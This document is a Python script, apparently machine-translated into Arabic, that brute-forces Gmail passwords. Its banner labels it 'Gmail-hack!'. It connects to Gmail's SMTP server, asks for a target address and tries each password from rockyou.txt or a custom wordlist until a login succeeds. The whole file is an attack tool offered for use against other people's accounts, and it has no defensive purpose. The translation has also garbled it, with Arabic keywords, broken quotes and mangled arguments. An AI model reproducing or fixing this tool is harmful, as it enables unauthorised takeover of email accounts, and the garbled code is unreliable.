يستورد smtplib

يستورد sys

من نظام التشغيل يستورد نظام

def عمل فني():

    مطبعة("\ن")

    مطبعة("################################################## ######### ")

    مطبعة("# #")

    مطبعة("# \ || / #")

    مطبعة("# |___oo #")

    مطبعة("# / \ / \ / (__ ،،،، | #")

    مطبعة("#) / ^ \) ^ \ / _) Gmail-hack! #)

    مطبعة("#) / ^ \ / _) CoDeD بواسطة: #")

    مطبعة("#) _ / / _) d4az #")

    مطبعة("# / \) / \ / || |) _) #")

    مطبعة("# <> | (،،)) __) #")

    مطبعة("# || / \) ___) \ #")

    مطبعة("# | \ ____ () ___)) ___ #")

    مطبعة("# \ ______ (_______ ؛؛؛ __ ؛؛؛ #")

    مطبعة("# #")

    مطبعة("################################################## ######### ")

    مطبعة("\ن")

    

    

عمل فني()

خادم SMTP = smtplib.SMTP("smtp.gmail.com"و587)

خادم SMTP.اهلو()

خادم SMTP.ستارتلس()

مستخدم = مدخل("أدخل عنوان Gmail الهدف =>")

مطبعة("\ن")

pwd = مدخل(أدخل "0" لاستخدام قائمة كلمات المرور المضمنة\نأدخل "2" لإضافة قائمة كلمات مرور مخصصة\ن=> ")

لو pwd=="0":

    passswfile="rockyou.txt"

أليف pwd=="2":

    مطبعة("\ن")

    passswfile = مدخل("اسم مسار الملف (لقائمة كلمات المرور) =>")

آخر:

    مطبعة("\ن")

    مطبعة("مدخل غير صالح!")

    sys.مخرج(1)

يحاول:

    passswfile = يفتح(passswfileو"ص")

يستثني استثناء مثل ه:

    مطبعة(ه)

    sys.مخرج(1)

ل كلمة المرور في passswfile:

    يحاول:

        خادم SMTP.تسجيل الدخول(مستخدموكلمة المرور)

        مطبعة("[+] تم العثور على كلمة المرور٪ s" ٪ كلمة المرور)

        استراحة

    يستثني smtplib.SMTPAuthenticationError:

        مطبعة("كلمة المرور [!] خاطئة.٪ s" ٪ كلمة المرور)
